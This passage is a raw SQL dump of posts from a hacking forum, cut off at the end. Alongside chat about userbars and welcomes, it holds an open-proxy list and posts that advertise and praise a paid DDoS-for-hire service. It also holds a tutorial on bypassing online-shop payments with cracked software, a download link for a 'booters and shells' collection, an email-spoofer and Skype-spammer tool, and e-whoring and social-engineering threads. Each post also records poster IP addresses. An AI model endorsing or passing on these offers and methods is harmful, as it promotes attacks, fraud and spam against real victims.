'[code]1.192.126.252:3128\r\n103.3.221.153:8080\r\n106.1.90.144:8088\r\n109.202.41.38:808\r\n109.234.29.57:3128\r\n111.67.75.99:8081\r\n114.255.193.231:8080\r\n114.80.149.183:80\r\n118.145.11.232:80\r\n119.62.72.202:8080\r\n122.170.3.229:3128\r\n123.128.56.9:8909\r\n123.138.16.82:8080\r\n123.30.128.79:5955\r\n125.37.63.72:8909\r\n125.76.237.68:80\r\n125.96.10.228:8909\r\n140.206.70.110:8888\r\n164.77.196.75:80\r\n164.77.196.78:80\r\n168.187.135.249:8080\r\n176.36.151.85:80\r\n177.69.236.242:80\r\n177.71.189.102:80\r\n180.167.15.242:8080\r\n180.252.181.83:80\r\n180.252.181.84:80\r\n186.201.158.74:80\r\n187.115.25.79:443\r\n187.45.206.144:80\r\n188.124.142.208:8123\r\n190.187.57.130:3128\r\n190.9.128.96:80\r\n193.147.86.249:3128\r\n194.190.33.234:3128\r\n195.138.81.100:3128\r\n195.16.49.214:80\r\n195.5.18.41:8118\r\n198.100.153.94:8118\r\n200.11.138.125:80\r\n200.143.132.102:80\r\n202.116.161.11:808\r\n202.117.120.24:80\r\n202.162.207.10:8080\r\n206.17.82.114:80\r\n208.89.215.230:80\r\n210.184.6.231:80\r\n210.41.98.80:808\r\n211.140.189.247:80\r\n211.232.93.13:808\r\n212.45.5.172:3128\r\n216.244.71.91:8087\r\n217.23.7.193:80\r\n217.24.114.114:3128\r\n218.108.169.104:80\r\n218.108.169.105:80\r\n218.108.169.107:80\r\n218.108.169.108:80\r\n218.108.169.109:80\r\n218.108.169.110:80\r\n218.204.131.250:3128\r\n218.204.73.190:808\r\n218.29.131.11:3128\r\n218.61.18.178:8080\r\n218.94.1.166:82\r\n219.75.27.11:80\r\n221.132.33.135:5955\r\n221.7.25.173:8080\r\n23.20.161.66:80\r\n23.29.112.186:80\r\n41.86.99.22:8080\r\n46.105.20.6:8080\r\n46.164.140.38:3128\r\n46.39.225.33:3128\r\n46.49.81.17:3128\r\n49.212.174.24:80\r\n59.37.168.16:8081\r\n59.66.151.136:8909\r\n60.177.19.17:8909\r\n61.155.95.28:8080\r\n61.172.203.212:8080\r\n61.177.252.38:8080\r\n61.187.186.150:81\r\n61.59.159.187:80\r\n67.23.169.58:143\r\n78.47.5.222:80\r\n84.241.44.251:8080\r\n84.94.130.153:3128\r\n85.92.159.84:8080\r\n86.12.154.1:80\r\n87.236.208.143:808\r\n88.178.107.15:8118\r\n91.121.100.200:8118\r\n93.114.45.122:80\r\n93.189.216.77:3128\r\n93.79.180.141:8080\r\n94.143.43.224:3128\r\n94.23.56.105:80\r\n95.31.23.122:3128\r\n95.80.92.52:3128[/code]', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '7ca85f361ae9b5f0b3a96a42ce092c6d', '0', '0'); INSERT INTO mybb_posts VALUES('2678', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348772336', 'Okay here are my attemps:\n\n[IMG]http://i.imgur.com/BBPGo.gif[/IMG]\n\n[IMG]http://i.imgur.com/6dEJ7.gif[/IMG]\n\n[IMG]http://i.imgur.com/NhCja.gif[/IMG]\n\n[IMG]http://i.imgur.com/WulML.gif[/IMG]\n\n[IMG]http://i.imgur.com/vaR2w.gif[/IMG]\n\n[IMG]http://i.imgur.com/gdWMV.gif[/IMG]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0c8108872caa4ad328cc239caf8a0290', '0', '0'); INSERT INTO mybb_posts VALUES('2679', '535', '2677', '14', 'RE: Proxy list', '0', '82', 'iTzIpod', '1348773268', 'Nice contribution. Thanks. Will be uploading mine soon. Has about 100k.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '90826f333dd194221ca49f74f59e8e25', '0', '0'); INSERT INTO mybb_posts VALUES('2680', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348773335', 'Thanks for all the entries.\nI am picking this one\n\n[img]http://i.imgur.com/ceRsZ.gif[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de0f6dfe0c227594c8d2b4d5d982fe12', '0', '0'); INSERT INTO mybb_posts VALUES('2681', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348779668', 'Updated the Unique Userbar. Also, changed the Requirements.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '761b406d3512fb46ecd1ea6d8feed6c7', '0', '0'); INSERT INTO mybb_posts VALUES('2682', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348784251', 'I think thats the best too :) glad you like it.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a65c8f6ff4ccf82da2f5c45bbf70a164', '0', '0'); INSERT INTO mybb_posts VALUES('2683', '531', '2667', '4', 'RE: Hello', '0', '1', 't3h jok3r', '1348788438', 'Welcome to L33THacking.\n\nI like your signature', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '873ff6f1143a31843a20110e1f03848c', '0', '0'); INSERT INTO mybb_posts VALUES('2684', '530', '2664', '48', 'RE: Link colors', '0', '1', 't3h jok3r', '1348788888', 'Alright I will check it out then post a screenshot of before and after', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '07494dcecdda3cd4042f190657a56f47', '0', '0'); INSERT INTO mybb_posts VALUES('2685', '529', '2675', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348793041', '[quote=\'iTzIpod\' pid=\'2675\' dateline=\'1348746914\']\r\nWe can still get that if we have that section don\'t you agree? \r\n\r\n\r\n[Quote=iTzIpod]\r\nThis can boost a lot of L33tHacking \'s activity. Because we can make a lot of threads. And a lot of posts this way\r\n[/Quote]\r\n[/quote]\r\n\r\nLets wait for a second opinion. Hopefully NXK, Apathy or someone checks this out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7f778d900150e122d2afe3f438640655', '0', '0'); INSERT INTO mybb_posts VALUES('2686', '536', '0', '4', 'Hey everyone!', '0', '200', 'Poptart', '1348794230', 'I\'m new to L33tHacking.net\r\nI love using photoshop. Even though I\'m bad at it.\r\nI don\'t really got any \"talents\" or whatever you call it. I don\'t know how to DDoS or hack. I just came here for fun. Might plan on being active who knows?', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '45777b73d608d4e08497c410664a4e81', '0', '0'); INSERT INTO mybb_posts VALUES('2687', '526', '2637', '3', 'RE: New Smilies', '0', '200', 'Poptart', '1348794406', 'I like the new smilies. I just registered so I don\'t know what the old ones were. But oh well. These ones look very cool :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'f9fcdd8819cd0330f931ed58f2133b61', '0', '0'); INSERT INTO mybb_posts VALUES('2688', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '200', 'Poptart', '1348794616', 'I think this is a great idea to boost forum activity.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'e599f1b5ff68f44dcf2881e579eb1528', '0', '0'); INSERT INTO mybb_posts VALUES('2689', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '200', 'Poptart', '1348794685', 'This group seems very HQ and Unique. Hope they become successful! :D I hope I can be in this group.\nLooks very decent. Good luck with the group iTzIpod! Also, nice Userbar.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '3568cc6b8b5ea26db920a8fb1e4b2afd', '0', '0'); INSERT INTO mybb_posts VALUES('2690', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '200', 'Poptart', '1348794760', 'Woah. That\'s really interesting. I want to meet this man in real life. He seems like a good role model. (Not really but like he did something very interesting) :p', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '2a63dcea4ab5f83b3610ac3b619a0418', '0', '0'); INSERT INTO mybb_posts VALUES('2691', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '200', 'Poptart', '1348794793', 'Congratulations iTzIpod on 700+ post! :D Your contribution to L33tHacking has improved it a lot.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'fa6bcf5e9752b61c47e8d55dbf72ce45', '0', '0'); INSERT INTO mybb_posts VALUES('2692', '514', '2551', '9', 'RE: How to make serious money', '0', '200', 'Poptart', '1348794835', 'Very nice guide and tutorial. Thanks for the share.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '02548468311cd2242f1ea2cee5edff53', '0', '0'); INSERT INTO mybb_posts VALUES('2715', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1348797243', 'Hey sorry !!! I was on vacation. I\'ll get you your vouch copy now. Message me again with the URL of the site.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'bbe2edc990fcdbd5f0b2dc42e2a13c01', '0', '0'); INSERT INTO mybb_posts VALUES('2694', '536', '2686', '4', 'RE: Hey everyone!', '0', '61', 'NXK', '1348794870', 'You\'ll learn one day, Just be motivated.\n\nWelcome to LH and I hope you stay active.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd67d1b2152da2ae1ea39ec8c57d68f43', '0', '0'); INSERT INTO mybb_posts VALUES('2695', '536', '2686', '4', 'RE: Hey everyone!', '0', '200', 'Poptart', '1348794936', 'Thank you NXK :D I\'ll try to stay active!', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '07283dc6af43efb90d95826a88a8bf3c', '0', '0'); INSERT INTO mybb_posts VALUES('2696', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '200', 'Poptart', '1348794997', 'That looks really good. The first one for sure. Could possibly be better if it was animated and looked like he was jumping around the userbar collecting coins? :p', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'ab9a52f5c2e089e8a71afa86377ed761', '0', '0'); INSERT INTO mybb_posts VALUES('2697', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '200', 'Poptart', '1348795062', 'Woah. That is so good. I can\'t make that :( I wanna learn to make something like that. 10/10 :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '187e909685faba6c546b4dd6414a3e00', '0', '0'); INSERT INTO mybb_posts VALUES('2698', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '200', 'Poptart', '1348795092', 'I have Photoshop CS6 Extended. It takes up a lot of space but it\'s worth it.', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '4493433192a40bf9b1e32023c330004b', '0', '0'); INSERT INTO mybb_posts VALUES('2699', '257', '1141', '35', 'RE: Nice Video Edit', '0', '200', 'Poptart', '1348795124', 'That first clip, is sexy. :o Going to subscribe! :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '6ce820aeeb4a9aab55a0c90af91d7dd2', '0', '0'); INSERT INTO mybb_posts VALUES('2700', '529', '2688', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348795226', '[quote=\'Poptart\' pid=\'2688\' dateline=\'1348794616\']\r\nI think this is a great idea to boost forum activity.\r\n[/quote]\r\n\r\nThanks for your opinion but lets wait for more opinions :)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd011fe036e530b8308f3048dc2b40720', '0', '0'); INSERT INTO mybb_posts VALUES('2701', '536', '2686', '4', 'RE: Hey everyone!', '0', '199', 'Anonymous™', '1348795248', 'Welcome to L33thacking.net Poptart!', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '40c01fde090fc7ccecd558d5ac94f4bd', '0', '0'); INSERT INTO mybb_posts VALUES('2702', '536', '2686', '4', 'RE: Hey everyone!', '0', '1', 't3h jok3r', '1348795288', 'Welcome to L33THacking popart. Hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '480057e70c2c5c05e0eb9787ed7342bd', '0', '0'); INSERT INTO mybb_posts VALUES('2703', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348795357', 'Is it possible the userbar could be transparent?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5dc3c4e9b1213cbb6fa6637223c5ee74', '0', '0'); INSERT INTO mybb_posts VALUES('2704', '533', '2669', '23', 'RE: How to Avoid JDB\'s', '0', '1', 't3h jok3r', '1348795406', 'Nice tutorial or how about remove java from your PC so it won\'t ever ask to run? ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '69c848145e0ad8b7fbe6d47f7460a1f4', '0', '0'); INSERT INTO mybb_posts VALUES('2705', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348795499', 'Honestly I don\'t know if I should make them into sub-forums or not. Sub-forums would be more organized as Reloadzor said but under the tab there would be only two forums.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ccc380df33946762e377be108e4f6db2', '0', '0'); INSERT INTO mybb_posts VALUES('2706', '527', '2652', '47', 'RE: Get my private free ebay items ebook and more', '0', '4', 'Triple H', '1348795705', 'Oh yeah i fogot. I updated the op', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '946ea3497a56d322aadfe1b62f2ee94b', '0', '0'); INSERT INTO mybb_posts VALUES('2707', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '4', 'Triple H', '1348795772', 'That\'s the nice achievement. Keep going l33thacking', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '30561179bcf18b37ff984aed0aa9aaf7', '0', '0'); INSERT INTO mybb_posts VALUES('2708', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '4', 'Triple H', '1348795826', 'Thanks, this contains everything you might want to know about DDoSing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fa2a0fe00cbce26a04cff26ee1ef2bff', '0', '0'); INSERT INTO mybb_posts VALUES('2709', '285', '1339', '12', 'RE: How to track location of person on any chat box', '0', '4', 'Triple H', '1348795909', 'Pretty old school style on getting the victims location.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e6ae299455d85b54f5ba328ea0e3acf2', '0', '0'); INSERT INTO mybb_posts VALUES('2710', '537', '0', '12', '[Very Hot!] How to bypass online shop payment! [Video]', '0', '4', 'Triple H', '1348795938', 'I\'ve decided to let you in on a little secret.\r\nI will show you how to bypass online shops payment, and how to get free stuff from pages like ClickBanks :)\r\nIt is very easy to accomplish, and you will be able to get a lot of useful free things :)\r\nKeep in mind that I made this video for another forum, but you can use it aswell :) \r\nYou will need a tool called Acunetrix for this to work, but you should be able to find a cracked edition online.\r\nWell, I\'ll just post the video below and you\'ll be able to see for yourself.\r\nThis will work on most Clickbanks shops, and a good deal of other shops which contain some sort of \'thank you\' page.\r\nPost any questions or thoughts below for a discussion of this method :)\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=6In0YQPX4K8[/video]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b9e7d37228acb422e202271e16328043', '0', '0'); INSERT INTO mybb_posts VALUES('2711', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '5', 'Timmy', '1348796258', 'And this right here is the best Social Engineering guide I have ever seen.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8aaf071dca2964d3e258e7919dd7d192', '0', '0'); INSERT INTO mybb_posts VALUES('2712', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '5', 'Timmy', '1348796310', 'Can I get this too? I need it when I\'m bored :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4610f0cf200f59938aafc2efe0b87770', '0', '0'); INSERT INTO mybb_posts VALUES('2713', '248', '1056', '16', 'RE: [Free][EBook] How to SE a 3DS', '0', '5', 'Timmy', '1348796358', 'Thanks for the update and are you referring to nintendo 3Ds?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b46720095fe8425e60f66a4ea9ac7776', '0', '0'); INSERT INTO mybb_posts VALUES('2714', '494', '2650', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '5', 'Timmy', '1348796474', '[quote=\'iTzIpod\' pid=\'2650\' dateline=\'1348712560\']\r\n[quote=\'Triple H\' pid=\'2647\' dateline=\'1348712278\']\r\nNever underestimate a Chinese :)\r\n\r\nI still don\'t believe it though.\r\n[/quote]\r\n\r\nI know right? I don\'t believe it too. But after more research of this, dang. It\'s true. It\'s something you don\'t want to believe, but you kinda have too.\r\n[/quote]\r\n\r\nI agree with you guys it\'s too hard to believe.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '11f0dad3da8240070817c5a41ffc9b14', '0', '0'); INSERT INTO mybb_posts VALUES('2716', '536', '2686', '4', 'RE: Hey everyone!', '0', '200', 'Poptart', '1348797777', 'Thanks everyone for the warm welcomes :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'a77d7b088659b04901176ea9bc88d80e', '0', '0'); INSERT INTO mybb_posts VALUES('2717', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '200', 'Poptart', '1348797830', 'Looks really neat. Thanks for the share! :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '47c3ae8371d7fa4a6efea83cecd335b6', '0', '0'); INSERT INTO mybb_posts VALUES('2718', '431', '2703', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348800341', '[quote=\'t3h jok3r\' pid=\'2703\' dateline=\'1348795357\']\r\nIs it possible the userbar could be transparent?\r\n[/quote]\r\n\r\nI was just going to ask this.. I want the background transparent please.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dd2d718fc10cc4b35e8594d528ee2af8', '0', '0'); INSERT INTO mybb_posts VALUES('2719', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348831812', 'Thank you Poptart. :D Hopefully one day you can join Unique :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c441c9a885c483ff305e79f2fb42d13', '0', '0'); INSERT INTO mybb_posts VALUES('2720', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348831852', 'Thanks Poptart :D Hope you can get 100 posts soon \nWhen you do, I\'ll congratulate you ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '01b803251086f669d8a24856a368aa1c', '0', '0'); INSERT INTO mybb_posts VALUES('2721', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348831887', 'No problem. It\'s the least I can do.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d88b6e9b64639dff1da97f58bdd8553', '0', '0'); INSERT INTO mybb_posts VALUES('2722', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348831916', 'You\'re right. But I don\'t know how to do that so... Sorry. :/ Thanks for your feedback though! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e4c5890b470c04bed7ae00e8b066951', '0', '0'); INSERT INTO mybb_posts VALUES('2723', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1348831964', 'That\'s cool. Can you show us some of your examples?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6bcfabb3b54386f248c9301d9bb120f5', '0', '0'); INSERT INTO mybb_posts VALUES('2724', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1348832047', 'Thanks for your feedback mate ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e1943b0a5fa59a80f994a1222e18c124', '0', '0'); INSERT INTO mybb_posts VALUES('2725', '257', '1141', '35', 'RE: Nice Video Edit', '0', '82', 'iTzIpod', '1348832128', ':D Thanks for the assistance for my brother\'s Youtube channel :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '631ef9af8b9b8a4bfe632782c0440c63', '0', '0'); INSERT INTO mybb_posts VALUES('2726', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '82', 'iTzIpod', '1348832276', 'Very nice tutorial :D Thanks for the share.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '275dd196754dc24c26a7e620f68b33a1', '0', '0'); INSERT INTO mybb_posts VALUES('2727', '536', '2686', '4', 'RE: Hey everyone!', '0', '82', 'iTzIpod', '1348832350', 'Welcome to L33tHacking.net bro. Enjoy your stay! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c01c40f298e9053794a87266f1783fab', '0', '0'); INSERT INTO mybb_posts VALUES('2728', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1348832381', 'No problem dude. Enjoy your new desktop background! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '55e908acf670f54e0e822e967659688a', '0', '0'); INSERT INTO mybb_posts VALUES('2729', '248', '2713', '16', 'RE: [Free][EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1348832469', '[quote=\'Timmy\' pid=\'2713\' dateline=\'1348796358\']\r\nThanks for the update and are you referring to nintendo 3Ds?\r\n[/quote]\r\n\r\nYes I am. And no problem. I had to fix the links because they were broken. ;) Or, someone had to do it...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ebb6a61392879936853a7269a21c6cd0', '0', '0'); INSERT INTO mybb_posts VALUES('2730', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348832529', 'Welcome back is the least I could say. How was it? And where did you go? \n\nOT: He\'s back in business everyone. :D I recommend his DDoSing service!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '54e7ae30872aee6f2bd2943fcd29bcaf', '0', '0'); INSERT INTO mybb_posts VALUES('2731', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348833257', 'Sub forums. In my opinion, they are more organized. Just like Reloadzor said. \n\nSubforums like\nPC\nXbox\nPS3\nNintendo \n\n\n\nI don\'t know', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd38d19e4b24fd5bb539378465a75986f', '0', '0'); INSERT INTO mybb_posts VALUES('2732', '538', '0', '63', 'Staff userbar', '0', '61', 'NXK', '1348851804', 'Admins and mods got new ones.. Wheres the staff userbar :(\r\n\r\nAdmins got a new new one too.. someones gotta make a new staff one :D\r\n\r\n(On phone sorry if this is LQ)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ecbb7238af4da24b3348aaf5b51e9295', '0', '0'); INSERT INTO mybb_posts VALUES('2733', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348853185', 'gif\'s lose quality with a transparent background, I know it\'s silly but its true.\nI made it matching the background where its going to be since theres no affect on quality then, i could give a shot with transparent one but it will lose quality, thats the downside of animated stuff', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ef4005135854a9d999cb5b0516f35054', '0', '0'); INSERT INTO mybb_posts VALUES('2734', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1348857174', 'Just fine :D I\'m hitting harder then ever too.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8a85fa71426a2b7550e4e4c7289f901d', '0', '0'); INSERT INTO mybb_posts VALUES('3498', '684', '0', '19', '[Junk]Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '1', 't3h jok3r', '1349473660', 'Welcome to the official thread of wTools. wTools is a next-gen application for multiple tools all built into one free program. Below you can find a list and screenshots of all the current features in the program. There\'s been a lot of work put into this, so I hope you guys enjoy it, and please leave me a comment if you try it out! Thanks to AeonHack for use of his themes. The program is not obfuscated, as this is open source software!\r\n\r\n[size=medium]Name:[/size]\r\nwTools\r\n\r\n[size=medium]Features:[/size]\r\n[list]\r\n[*] Easy-To-Use GUI\r\n[*] IP Pinger\r\n[*] IP Tracer\r\n[*] CloudFlare Resolver\r\n[*] Email Spoofer - Need to fix\r\n[*] Skype Tools\r\n[list]\r\n[*] Mass Messenger\r\n[*] Mass Messenger Spammer\r\n[*] Spammer\r\n[*] Annoying Spammer\r\n[/list]\r\n[/list]\r\n\r\n\r\n[size=medium]Download Link:[/size]\r\nhttp://www.filefactory.com/file/1p5kd0vfkz65/n/wTools_v1.4.zip\r\n\r\n[size=medium]Virus Scan:[/size]\r\nhttps://www.virustotal.com/file/65032ecd93146da06798e5a5ca728d001a7c6e705908f300837df5230b1a6e30/analysis/1347939496/\r\n(false positive)\r\n\r\n\r\n[size=medium]Screenshots:[/size]\r\n[spoiler]\r\n[img]http://i.minus.com/jbagHnwlkb761z.png[/img]\r\n\r\n[img]http://i.minus.com/i9H03kqDs9bo4.png[/img]\r\n[/spoiler]\r\n\r\n\r\nCredis: I think Breshie', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '15e101633844404c966b18c48a0770c6', '0', '0'); INSERT INTO mybb_posts VALUES('2736', '539', '0', '4', 'YO WHAT UP!', '2', '203', 'NeonLights', '1348859969', 'HEY im neonlights \r\nand well im from another called ubers.org :)\r\nwas invited here to do some work and well... thats that\r\n\r\nmy ubers profil: http://www.ubers.org/member.php?action=profile&uid=94465\r\n\r\na bit about me:\r\n\r\ni like smoking weed \r\ni like listening to rap\r\ni have a girlfriend so dont harrasse me\r\nand some other shit\r\n\r\n:D \r\ni suuuck at making these type of threads so.... yea', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', '081566f0fa2e21e3ac4db0bce5d639cf', '0', '0'); INSERT INTO mybb_posts VALUES('2737', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '62', 'R?????zo?', '1348860608', 'welcome bro, and stay HQ :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2c306d260deaaa074517c83899ebc86e', '0', '0'); INSERT INTO mybb_posts VALUES('2738', '539', '2737', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1348861515', '[quote=\'R?????zo?\' pid=\'2737\' dateline=\'1348860608\']\r\nwelcome bro, and stay HQ :)\r\n[/quote]\r\n\r\n:) someguy sent me here from ubers\r\nsaying i would get an updrade or something if i help the site out with some problems...', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', '4d675e31416afbc4e872fd9b2e219cd6', '0', '0'); INSERT INTO mybb_posts VALUES('2739', '540', '0', '15', 'Collection Of Booters and Shells', '19', '203', 'NeonLights', '1348861770', '[align=center][img]http://imageshack.us/a/img228/4622/bootersandshells.jpg[/img]\n\nscan: https://www.virustotal.com/file/ccea24d5e6df53485693eda0df3eebf06d166bbb4b7aa2888688e06c5e25cf91/analysis/1347831754/\n\n[lock]download: http://adf.ly/382489/http://www.mediafire.com/?0m19dkgnk672spm[/lock]\n\nenjoy guys :)[/align]', '67.68.75.99', '1128549219', '1', '0', '1', '1352011692', '1', '1559cf34e886a56782d45fb0b97077ce', '0', '1352011692'); INSERT INTO mybb_posts VALUES('2740', '541', '0', '21', '[INFO] what is a botnet/RAT? complete explanation', '0', '203', 'NeonLights', '1348861860', '[align=center]What is a botnet?\r\n-----------------\r\n\r\na botnet is a network of bots (sometimes explained as a contraction of the word \"robots\")... essentially a bot is a program that, much like a RAT, allows a 3rd party to direct the affected machine to perform certain tasks; however, unlike a RAT, bots don\'t sit around on the affected machine waiting for a 3rd party to find and connect to them - instead they go out and connect to one or more communication points where other instances of the bot have also connected to and await instruction... in this way the 3rd party can give instructions thousands of affected computers at once...\r\n\r\nthe simplest botnet configuration is where all the bots connect to a single hub (such as an IRC chat room) where the bot master (the 3rd party controlling the bots) will give them instructions... although this is conceptually simple, it suffers from problems of scale - the more bots connected to a central communication server the harder it will be for that server to cope with all the connections... \r\n\r\na hierarchical network, where the bot master communicates with only a few (hundred?) bots which in turn each command a few (hundred?) more and so on, is also possible... this has the benefit of scaling better and allowing the bot master to cultivate a much larger botnet... \r\n\r\na third possible configuration is a peer to peer network between bots so that the bot master need only communicate with a single bot which in turn spreads the command to it\'s bot peers... a peer to peer configuration can help with scaling as well but the more significant strength is it\'s non-reliance on a central communication point that might get attacked and/or shut down...\r\n\r\nin addition to the more sophisticated communication pathway between the machine and the remote 3rd party another difference between a bot and a RAT is that, although a bot gives control of the affected machine to a remote 3rd party, a bot would never be used for remote administration purposes... a botnet\'s strength is in aggregating control over huge numbers of machines and while a remote control software may be a legitimate means to perform quick and dirty remote administration of one or two machines, when you get to large numbers more formal techniques and technologies (such as group policy or active directory) become appropriate...\r\n\r\none way bots can get installed on a system by tricking the user into running an email or instant message attachment or other file downloaded from the internet and in this case the bot would qualify as a trojan horse at the very least... bots also are often able to spread themselves to systems by self-replication either as worms or viruses or both... in fact self-replication is often the best way to affect large numbers of systems (as we have seen time and again with worms like blaster and slammer)...\r\n\r\n--------------\r\nWhat is a RAT?\r\n--------------\r\n\r\nA remote access tool (a RAT) is a piece of software that allows a remote \"operator\" to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, \"RAT\" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victims knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software.\r\nThe operator controls the RAT through a network connection. Such tools provide an operator the following capabilities:[1]\r\nScreen/camera capture or image control[2]\r\nFile management (download/upload/execute/etc.)[3]\r\nShell control (from command prompt)[4]\r\nComputer control (power off/on/log off if remote feature is supported)\r\nRegistry management (query/add/delete/modify)[5]\r\nOther software product-specific functions\r\nIts primary function is for one computer operator to gain access to remote PCs. One computer will run the \"client\" software application, while the other computer(s) operate as the \"host(s)\".\r\n\r\nReverse connection\r\n\r\nIn this mode of operation remote computer(s) acts as the \"Host\" for the RAT software, for the \"client\" remote administrator to control. RATs that use this method of connectivity have the following operational advantages.\r\nOutgoing connections are generally perceived as less threatening to the remote \"host\" user, as it is the remote user who activates the download of the remote 